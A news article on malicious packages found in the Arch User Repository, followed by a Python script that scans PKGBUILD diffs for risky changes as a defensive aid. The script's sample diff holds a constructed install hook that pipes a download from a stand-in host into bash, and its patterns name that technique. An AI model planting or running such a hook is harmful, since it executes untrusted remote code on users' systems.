
Malicious apps got into the Arch User Repository - how to protect yourself

Why This Matters

The discovery of malicious apps in the Arch User Repository highlights the ongoing cybersecurity risks associated with open-source software platforms. For consumers and developers, it underscores the importance of vigilance and thorough review when installing or updating software from community-driven repositories, especially those with less stringent oversight.


Elyse Betters Picaro/ZDNET


ZDNET's key takeaways

The Arch User Repository was found to contain malicious apps.

This was discovered twice in the span of a week.

Users are warned to be vigilant, but there are other, easier ways to stay protected.

Researchers at software supply chain management company Sonatype found that the Arch User Repository contained about 1,500 malicious packages, the company said in a blog post updated June 12.

"We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information," the Arch team said in a brief statement.

This does not bode well for a repository that was created to dramatically increase the amount of software available to Arch (and Arch derivative) users.
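
The review the Arch team asks for can be partly automated before the manual read. The following is an added example, not code from ZDNET, Sonatype or the Arch project: it scans a unified diff of an AUR package update and flags added PKGBUILD and .install lines that deserve a closer look. The pattern list and the sample package are assumptions constructed for illustration.

```python
import re
# Review heuristics assumed for this example; not an official Arch checklist.
RISKY = [
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("checksum-skipped", re.compile(r"^\s*(md5|sha\d+|b2)sums(_\w+)?\+?=.*SKIP")),
    ("source-changed", re.compile(r"^\s*source(_\w+)?\+?=")),
    ("install-hook", re.compile(r"^\s*install=")),
]
WATCHED = re.compile(r"(^|/)(PKGBUILD|[^/]+\.install)$")

def review_diff(diff_text):
    """Return (file, new_line_no, label, text) for each flagged added line."""
    findings, current, line_no = [], None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):            # file header: pick the target path
            path = raw[4:].split("\t")[0].removeprefix("b/")
            current = path if WATCHED.search(path) else None
        elif raw.startswith("@@"):            # hunk header: reset the line counter
            m = re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", raw)
            line_no = int(m.group(1)) if m else 0
        elif raw.startswith("+"):             # added line: test it, then count it
            if current:
                findings += [(current, line_no, label, raw[1:].strip())
                             for label, pat in RISKY if pat.search(raw[1:])]
            line_no += 1
        elif raw.startswith(" "):             # context line: only count it
            line_no += 1
    return findings

# Constructed sample: a fictional package update as `git diff` would print it.
SAMPLE_DIFF = """\
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,4 +1,5 @@
 pkgname=example-tool
-source=("https://example.org/example-tool-1.0.0.tar.gz")
-sha256sums=('<old checksum>')
+source=("https://example.org/example-tool-1.0.1.tar.gz")
+sha256sums=('SKIP')
+install=example-tool.install
 arch=('x86_64')
--- /dev/null
+++ b/example-tool.install
@@ -0,0 +1,3 @@
+post_install() {
+  curl -s https://example.invalid/setup.sh | bash
+}
"""
print(*review_diff(SAMPLE_DIFF), sep="\n")
```

A flagged line is a prompt to read that change, not a verdict: a legitimate version bump also changes `source=`, and a clean result does not replace reading the diff.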
